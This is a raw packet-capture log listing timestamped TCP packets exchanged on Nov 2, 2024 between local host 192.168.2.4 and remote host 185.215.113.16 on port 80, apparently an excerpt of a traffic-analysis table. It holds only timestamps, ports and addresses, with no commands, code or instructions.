                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924441099 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924469948 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924470901 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924477100 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924489021 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924505949 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924515963 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924516916 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924531937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924561977 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924561977 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924566031 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924607992 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924616098 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924633026 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924650908 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924659014 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924663067 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924679041 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924679041 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924719095 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924844980 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924870968 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924882889 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924901009 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924926996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924926996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924937963 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924948931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924959898 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.924983978 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925002098 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925004005 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925013065 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925024986 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925039053 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925050020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925069094 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925085068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925087929 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925096035 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925107956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925121069 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925132990 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925137043 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925158024 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925180912 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925256968 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925293922 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925306082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925316095 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925368071 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925368071 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925374031 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925384998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925409079 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925421000 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925430059 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925438881 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925450087 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925451040 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925462008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925468922 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925472975 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925483942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925487995 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925494909 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925512075 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925512075 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925525904 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925529957 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925537109 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925548077 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925559998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925570965 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925578117 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925596952 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925606012 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925615072 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925622940 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925635099 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925654888 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925672054 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925673962 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925673962 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925685883 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925693035 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925694942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925734997 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925734997 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925759077 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925770998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925781965 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925793886 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925805092 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925818920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925826073 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925826073 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925856113 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925857067 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925884008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925894022 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925903082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925915956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925926924 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925936937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925936937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925968885 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925967932 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925967932 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.925992012 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926002979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926013947 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926016092 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926040888 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926064014 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926094055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926105976 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926119089 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926135063 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926167011 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926167011 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926170111 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926182985 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926192999 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926211119 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926223040 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926229954 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926229954 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926234007 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926246881 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926249027 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926266909 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926276922 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926282883 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926289082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926331043 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926450968 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926461935 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926472902 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926487923 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926491976 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926503897 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926506996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926531076 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926531076 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926559925 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926616907 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926628113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926639080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926659107 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926666021 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926670074 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926687956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926700115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926708937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926708937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926708937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926711082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926722050 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926732063 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926738024 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926748991 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926752090 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926760912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926772118 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926775932 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926775932 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926794052 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926815987 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926826954 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926836014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926847935 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926852942 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926873922 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926891088 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926927090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926938057 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.926975965 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.927227020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.927237988 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.927248001 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.927273035 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.927303076 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.002067089 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.002120018 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.002334118 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.002919912 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.044872046 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.044953108 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.044961929 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.044979095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.044991016 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045001030 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045006990 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045011997 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045022964 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045027971 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045033932 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045047998 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045072079 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045089960 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045089960 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045100927 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045110941 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045121908 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045133114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045144081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045144081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045150995 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045164108 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045172930 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045177937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045186996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045196056 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045197010 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045212030 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045214891 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045229912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045243979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045247078 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045257092 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045284033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045286894 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045286894 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045300007 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045309067 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045311928 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045330048 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045331001 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045340061 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045350075 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045352936 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045365095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045367002 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045376062 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045387030 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045392036 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045419931 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045447111 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045458078 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045466900 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045476913 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045492887 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045494080 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045504093 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045512915 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045516014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045526981 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045527935 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045562029 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045572996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045581102 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045583963 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045594931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045612097 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045636892 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045636892 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045655012 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045665979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045681000 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045691013 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045697927 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045716047 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045737982 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045747042 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045762062 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045772076 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045794964 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045799017 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045813084 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045815945 CET6386280192.168.2.4185.215.113.16
